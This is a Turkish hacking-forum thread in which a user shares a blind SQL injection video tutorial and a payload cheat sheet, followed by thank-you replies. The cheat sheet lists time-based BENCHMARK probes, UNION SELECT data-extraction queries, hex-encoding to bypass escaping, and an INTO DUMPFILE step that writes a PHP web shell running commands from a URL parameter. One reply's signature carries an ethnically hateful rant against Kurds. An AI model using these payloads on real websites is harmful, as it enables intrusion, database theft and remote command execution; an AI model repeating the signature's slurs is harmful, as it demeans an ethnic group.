folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder SQL Injection - Video Döküman (Temel, İleri Seviye)



SQL Injection - Video Döküman (Temel, İleri Seviye)

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Merhaba sevgili müridler,

    Sizler için hazırladığım bu amatör videoda SQL Injectionın(Blind) çok fazla bilinmeyen yöntemlerini göstereceğim, umarım faydalı olur. İyi seylirler Gülümseme

    Video Link : SQL INJECTION - VIDEO TUTORIAL ~ Tahribat.com Holyzone

     

    EK(Videoda kullandığım sayfa)

    #Blind
    
    ->Temel Seviye
    --> Matematik 
    FLOOR (RAND() * 9999) 
    ROUND(112,-1) 
    --> Ekstra 
    MD5('Tahribat.com') 
    HEX('Tahribat.com') 
    LENGTH(COMPRESS(REPEAT('TBT',1)))
    --> Benchmark (Zaman tabanlı SQL Injection)
    BENCHMARK(10000000,MD5(CHAR(99)))
    --> Veri toplamak
    ---> Tablo Sayısı
    COUNT(*) FROM tablo_adı 
    ---> Alan
    FROM holyzone WHERE baslik LIKE "%holyzone%"
    -> İleri Seviye
    --> Outfile
    icerik FROM tablo_adı WHERE id= '1' INTO OUTFILE 'dir'
    --> Dumpfile
    INTO DUMPFILE 'dir'
    <?php system($_GET['cmd']);?> 
    --> CHAR() 
    --> Hash ayıklama
    baslik FROM holyzone WHERE id= '1'
    UNION SELECT IF(SUBSTRING(baslik,1,1) = CHAR(97),
    BENCHMARK(1000000,MD5('x')),null),2,3 FROM holyzone
    --> Escaping Bypassing
    #normal UNION SELECT 1,2,'tahribat.com'
    #bypassed UNION SELECT 1,2,0x74616872696261742e636f6d
    Ekstra kısmında nasıl hex kodu alacağınızı göstermiştim
    başına 0x eklemeyi unutmayın.
    
    /* Bu ve bunun gibi bir çok olayı SQL Injection aracılığı ile
    kolay bir şekilde yapmanız mümkündür :) */
    
    
    
    

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    unix
    Andrei
    Andrei's avatar
    Banlanmış Üye
    Kayıt Tarihi: 11/Aralık/2008
    Erkek

    helal selim, bize de böyle seyler lazım.

    henüz izlemedim ama meraklısı olan arkadaslara faydalı olacagına adım gibi eminim.


    %40 indirimli olarak "Centos Sistem ve Sunucu Yönetimi" adlı kitabımızı satın alarak, Linux üzerine yapılacak olan devam projeleri icin destekte bulunabilirsiniz : http://www.hepsiburada.com/centos-sistem-ve-sunucu-yonetimi-oku-izle-dinle-ogren-p-KKODLAB01579
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kvasir
    kvasir's avatar
    Kayıt Tarihi: 24/Ağustos/2005
    Erkek

    eline sağlık dostum.

    edit: şimdi izledim video yu helal on numara anlatım

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Metanet
    Metanet's avatar
    Kayıt Tarihi: 07/Temmuz/2007
    Erkek

    Faydalı bir döküman.Eline sağlık hoca.


    Burda cok felsefi bir yazi yazdigini dusun , ne sen yorul ne de ben yorulayım. İş yapılmayacaklar listem : hipokondriyak
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    FCN
    FCN's avatar
    Kayıt Tarihi: 28/Eylül/2007
    Erkek

    güzel gözüküyor holy eline sağlık

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SinusX
    SinusX's avatar
    Kayıt Tarihi: 14/Aralık/2010
    Erkek

    O textleri de istemeyi düşünüyodum videoyu izleyene kadar eklemişsin :) eline sağlık 


    Si vis pacem para bellum.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BuZuL
    BuZuL's avatar
    Kayıt Tarihi: 09/Eylül/2005
    Erkek

    çentük attım eyv güzel döküman


    DAĞDA ÜÇ BEŞ KOYUN SÜRÜSÜ, TUTTURMUŞ BİR KÜRDİSTAN TÜRKÜSÜ, ELİNE ALMIŞ BAYRAK DİYE BİR MASA ÖRTÜSÜ, SATSAN BEŞ PARA ETMEZ NE DİRİSİ NE DE ÖLÜSÜ, SOYU SOYSUZ OLAN SENSİN TOPRAK SENİN NEYİNE, İTE İTLİK YAPIP KAFA TUTMA BEYİNE, ANLASA DEDİĞİMİ SOKAKTAKİ KÖPEK AĞLAR HALİNE, DUY ULAN SOYSUZ NE MUTLU TÜRKÜM DİYENE.......
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    XCoder
    XCoder's avatar
    Kayıt Tarihi: 15/Haziran/2007
    Erkek
    çok sağol eline sağlık adaş ;)

    The ability to destroy a planet is insignificant next to the power of the force.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Peroksit
    Peroksit's avatar
    Kayıt Tarihi: 20/Eylül/2003
    Erkek

    müzikte süpermiş :D afrikaya gittim


    http://www.youtube.com/watch?v=OH4eOQ6ZI0Q - - - - - http://www.youtube.com/watch?v=TqErNP20gpI - - - - - https://www.youtube.com/watch?v=fhr5UBZh1rY
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    anakara bunu yazdı:
    -----------------------------

    müzikte süpermiş :D afrikaya gittim


    -----------------------------

    :)

    Sağolun müridler, SQL Injection dökümanları devam edecek.

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SpArK
    SpArK's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    Internete herzaman erisim olmuyor, benim gibi bilgisayara indirip izlemek isteyen arkadaslar icin : http://selimonder.com/dosya/video/sqli_1/SQL2.mp4

     

    Ellerine saglik holyzone kardesim.

Toplam Hit: 5500 Toplam Mesaj: 32